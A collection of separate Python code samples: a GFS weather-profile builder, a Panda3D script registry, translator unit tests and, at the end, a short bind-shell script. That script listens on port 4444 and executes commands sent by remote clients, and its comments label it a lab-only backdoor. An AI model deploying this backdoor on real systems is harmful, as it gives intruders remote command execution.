    cld_wc=cld_pavg*rho*-dz
    ice_cld=gfs[find_var(gfs,"ICMR_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    ice_cld=ice_cld.rename({ice_cld.dims[0]: 'lv_ISBL_HYD'})
    ice_cld_pavg = ice_cld.interp(lv_ISBL_HYD=pavg.coords['lv_ISBL0'], kwargs={"fill_value": 0.0})
    ice_effr=effr_ice(ice_cld_pavg,t)
    ice_wc=ice_cld_pavg*rho*-dz
    rain_cld=gfs[find_var(gfs,"RWMR_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    rain_cld=rain_cld.rename({rain_cld.dims[0]: 'lv_ISBL_HYD'})
    rain_cld_pavg = rain_cld.interp(lv_ISBL_HYD=pavg.coords['lv_ISBL0'], kwargs={"fill_value": 0.0})
    rain_effr=effr_rain(rain_cld_pavg)
    rain_wc=rain_cld_pavg*rho*-dz
    snow_cld=gfs[find_var(gfs,"SNMR_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    snow_cld=snow_cld.rename({snow_cld.dims[0]: 'lv_ISBL_HYD'})
    snow_cld_pavg = snow_cld.interp(lv_ISBL_HYD=pavg.coords['lv_ISBL0'], kwargs={"fill_value": 0.0})
    snow_effr=effr_snow(snow_cld_pavg)
    snow_wc=snow_cld_pavg*rho*-dz
    grp_cld=gfs[find_var(gfs,"GRLE_P0_L100_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    grp_cld=grp_cld.rename({grp_cld.dims[0]: 'lv_ISBL_HYD'})
    grp_cld_pavg=grp_cld.interp(lv_ISBL_HYD=pavg.coords['lv_ISBL0'], kwargs={"fill_value": 0.0})
    # NOTE(review): graupel reuses the SNOW effective-radius fit here
    # (effr_snow, not effr_grp) — confirm this is intentional.
    grp_effr=effr_snow(grp_cld_pavg)
    grp_wc=grp_cld_pavg*rho*-dz
    # Satellite/solar geometry at the valid time for every grid point.
    year=valid_time.year
    month=valid_time.month
    day=valid_time.day
    hour=valid_time.hour
    angles = angle_2d(t.coords['lat_0'].values, t.coords['lon_0'].values, year,month,day,hour)
    xangles = xr.DataArray(angles, name="xangles", dims=[t.dims[1], t.dims[2], 'angles'],
                           coords=[t.coords['lat_0'], t.coords['lon_0'], np.arange(0, 5)])
    # Broadcast the valid time to every grid point as [y, m, d, h, 0, 0].
    datetimes=xr.DataArray(np.zeros((len(y0),len(x0),6)),dims=[t.dims[1],t.dims[2],'ymd'],coords=[t.coords['lat_0'],t.coords['lon_0'],np.arange(0,6)])
    datetimes[:, :, 0] = year
    datetimes[:, :, 1] = month
    datetimes[:, :, 2] = day
    datetimes[:, :, 3] = hour
    datetimes[:, :, 4] = 0
    datetimes[:, :, 5] = 0
    # u and v 10m
    u10=gfs[find_var(gfs,"UGRD_P0_L103_")]
    u10=u10.rename({u10.dims[0]:'lv_HTGL_wind'})
    u10=u10.sel(lv_HTGL_wind=10.0, lat_0=y0, lon_0=x0,method='nearest')
    v10=gfs[find_var(gfs,"VGRD_P0_L103_")]
    v10=v10.rename({v10.dims[0]:'lv_HTGL_wind'})
    v10=v10.sel(lv_HTGL_wind=10.0, lat_0=y0, lon_0=x0,method='nearest')
    print(u10.max(),u10.min())
    # 10 m wind speed and direction (degrees, from atan2 of v over u).
    speed10m = np.sqrt(u10 * u10 + v10 * v10)
    dir10m=np.arctan2(v10, u10)/np.pi*180
    # land mask
    lm=gfs[find_var(gfs,"LAND_P0_L1_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    sm=1-lm
    snow=gfs[find_var(gfs,"CSNOW_P0_L1_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    ice=gfs[find_var(gfs,"ICEC_P0_L1_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    print(lm.max(),lm.min())
    print(sm.max(),sm.min())
    print(snow.max(),snow.min())
    print(ice.max(),ice.min())
    # surface temp
    sfctemp=gfs[find_var(gfs,"TMP_P0_L1_")].sel(lat_0=y0, lon_0=x0,method='nearest')
    print(sfctemp)
    # surface type
    sfctype=xr.DataArray(np.zeros((len(y0),len(x0),6)),dims=[t.dims[1],t.dims[2],'type'],coords=[t.coords['lat_0'],t.coords['lon_0'],np.arange(0,6)])
    # land type
    landtype=xr.DataArray(np.zeros((len(y0),len(x0))),dims=[t.dims[1],t.dims[2]],coords=[t.coords['lat_0'],t.coords['lon_0']])
    # read surface type database (NOTE: rebinds the parameter name `f`)
    f = xr.open_dataset("MCD12C1.006.ncml.nc")
    modis_data = f.Majority_Land_Cover_Type_1[18][::-1, ::1]
    lat = np.arange(-90, 90, 0.05)
    lon = np.arange(-180, 180, 0.05)
    # Shift longitudes to the 0-360 convention used by the model grid.
    lon = np.where(lon<0,lon+360,lon)
    modis_data = modis_data.assign_coords({"Latitude": lat})
    modis_data = modis_data.assign_coords({"Longitude": lon})
    # interpolate database to model grid
    landtype=modis_data.interp(Latitude=t.coords['lat_0'],Longitude=t.coords['lon_0'])
    sfctype[:,:,0]=landtype[:,:]
    sfctype[:,:,1:5]=0
    # Name every DataArray so xr.merge produces well-named output variables.
    datetimes.name="valid_time"
    pint.name="plevel"
    pavg.name="player"
    tavg.name="temp"
    mixavg.name="moisture"
    o3_pavg.name="o3"
    cld_wc.name="water_cloud"
    cld_effr.name="water_cloud_effr"
    ice_wc.name='ice_cloud'
    ice_effr.name="ice_cloud_effr"
    snow_wc.name = 'snow_cloud'
    snow_effr.name='snow_cloud_effr'
    rain_wc.name = 'rain_cloud'
    rain_effr.name='rain_cloud_effr'
    grp_wc.name = 'graupel_cloud'
    grp_effr.name='graupel_cloud_effr'
    lm.name="landmask"
    sm.name="seamask"
    sfctemp.name="sfctemp"
    snow.name="snow_cover"
    ice.name="ice_cover"
    sfctype.name="land_type"
    speed10m.name='wind_speed'
    dir10m.name="wind_dir"
    all_data=xr.merge([xangles,datetimes,pint,pavg,tavg,mixavg,o3_pavg,cld_wc,cld_effr,ice_wc,ice_effr,snow_wc,snow_effr,rain_wc,rain_effr,grp_wc,grp_effr,lm,sfctemp,snow,ice,sfctype,speed10m,dir10m])
    print("combined")
    all_data.to_netcdf("profile2d4_2021_gfs_EMCUPP_qv1000.nc","w")
if __name__ == "__main__":
    # Build the profile dataset from the GRiB2 path configured above (f1).
    create_profile2d(f1,fobs)
| StarcoderdataPython |
9619361 | <filename>src/p3d/pandaManager.py
import logging
import os
import weakref
logger = logging.getLogger(__name__)
class PandaManager:
    """Registry of script-backed objects that broadcasts Panda lifecycle
    events (init/start/stop/del) via the global ``messenger`` and supports
    hot-reloading of registered scripts.

    Registered objects are held in per-script ``weakref.WeakSet``s so the
    registry never keeps them alive on its own.
    """
    # Event names broadcast through the Panda3D messenger.
    PANDA_BEHAVIOUR_INIT = 'PandaBehaviourInit'
    PANDA_BEHAVIOUR_START = 'PandaBehaviourStart'
    PANDA_BEHAVIOUR_STOP = 'PandaBehaviourStop'
    PANDA_BEHAVIOUR_DEL = 'PandaBehaviourDel'
    def __init__(self):
        # Guard so a repeated __init__ call does not wipe the registry.
        if not hasattr(self, 'initialised'):
            # Maps script path (without extension) -> WeakSet of objects.
            self.pObjs = {}
            # Set initialise flag
            self.initialised = True
    def Init(self):
        messenger.send(self.PANDA_BEHAVIOUR_INIT)
    def Start(self):
        messenger.send(self.PANDA_BEHAVIOUR_START)
    def Stop(self):
        messenger.send(self.PANDA_BEHAVIOUR_STOP)
    def Del(self):
        messenger.send(self.PANDA_BEHAVIOUR_DEL)
    def RegisterScript(self, filePath, pObj):
        """
        Register the script and the instance. Make sure to register the .py
        file, not a .pyo or .pyc file.
        """
        filePath = os.path.splitext(filePath)[0]# + '.py'
        self.pObjs.setdefault(filePath, weakref.WeakSet([]))
        self.pObjs[filePath].add(pObj)
    def DeregisterScript(self, scriptPath):
        """Drop every object registered under *scriptPath* (extension ignored)."""
        filePath = os.path.splitext(scriptPath)[0]
        if filePath in self.pObjs:
            # NOTE(review): logger.info is called print-style with a second
            # positional arg but no %s placeholder (and 'degister' is a
            # typo) — likely a bug; confirm and fix separately.
            logger.info('degister: ', filePath)
            del self.pObjs[filePath]
        else:
            logger.info('couldnt find: ', filePath)
    def ReloadScripts(self, scriptPaths):
        """
        Reload the scripts at the indicated file paths. This means reloading
        the code and also recreating any objects that were attached to node
        paths in the scene.
        """
        # Only paths that are actually registered are considered.
        scriptPaths = set(scriptPaths) & set(self.pObjs.keys())
        for scriptPath in scriptPaths:
            logger.info('Reloading script: ', scriptPath)
            for pObj in self.pObjs[scriptPath]:
                pObjWrpr = base.node_manager.wrap(pObj)
pObjWrpr.ReloadScript(scriptPath) | StarcoderdataPython |
5168691 | <reponame>floroe1988/xzceb-flask_eng_fr
from ibm_cloud_sdk_core import ApiException
from translator import englishToFrench, frenchToEnglish
import unittest
class TestFrenchTranslation(unittest.TestCase):
    """Unit tests for the French -> English translation helper."""

    def test_frenchToEnglish_assertNotEqual(self):
        # A non-empty French input must never produce an empty result.
        result = frenchToEnglish("Bonjour")
        self.assertNotEqual(result, "")

    def test_frenchToEnglish_assertEqual(self):
        expected = {
            'character_count': 7,
            'translations': [{'translation': 'Hello'}],
            'word_count': 1,
        }
        self.assertEqual(frenchToEnglish("Bonjour"), expected)
class TestEnglishTranslation(unittest.TestCase):
    """Unit tests for the English -> French translation helper."""

    def test_englishToFrench_assertNotEqual(self):
        # Bug fix: this test previously called frenchToEnglish("Hello"),
        # exercising the wrong function. It now tests englishToFrench as the
        # test name states.
        self.assertNotEqual(englishToFrench("Hello"), "")

    def test_englishToFrench_assertEqual(self):
        expected = {
            'character_count': 5,
            'translations': [{'translation': 'Bonjour'}],
            'word_count': 1,
        }
        self.assertEqual(englishToFrench("Hello"), expected)
if __name__ == "__main__":
    # Discover and run every TestCase in this module when executed directly.
    unittest.main()
11226303 | import socket
def handle_client(client_socket):
    """Serve one client: read a command per line, run it, send back stdout.

    SECURITY WARNING: this executes arbitrary attacker-supplied commands
    received over the socket — it is a bind-shell backdoor. Only ever run
    it in an isolated lab/CTF environment.

    Bug fixes vs. the original:
    - a peer disconnect made recv() return b'' forever, so the loop spun and
      then crashed on subprocess.run(['']); we now break out cleanly.
    - an unknown command raised OSError and killed the handler with the
      socket left open; errors are now reported to the client instead.
    """
    import subprocess
    try:
        while True:
            client_socket.send(b'> ')
            data = client_socket.recv(1024)
            if not data:
                # Empty read == connection closed by the peer.
                break
            # Drop the trailing newline byte, as the original did; replace
            # (rather than crash on) any non-ASCII input.
            request = data[:-1].decode('ascii', errors='replace')
            try:
                res = subprocess.run(request.split(' '), capture_output=True)
                client_socket.send(res.stdout)
            except OSError as exc:
                client_socket.send(str(exc).encode('ascii', errors='replace') + b'\n')
    finally:
        # Guarantee the socket is released even if send/recv raises.
        client_socket.close()
# SECURITY WARNING: binds a remote command-execution service (backdoor) on
# every network interface. Lab/CTF use only.
bind_ip = "0.0.0.0"
bind_port = 4444
# Plain TCP listener.
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
# Accept exactly one connection, serve it to completion, then the script
# exits (no accept loop).
client, addr = server.accept()
handle_client(client)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.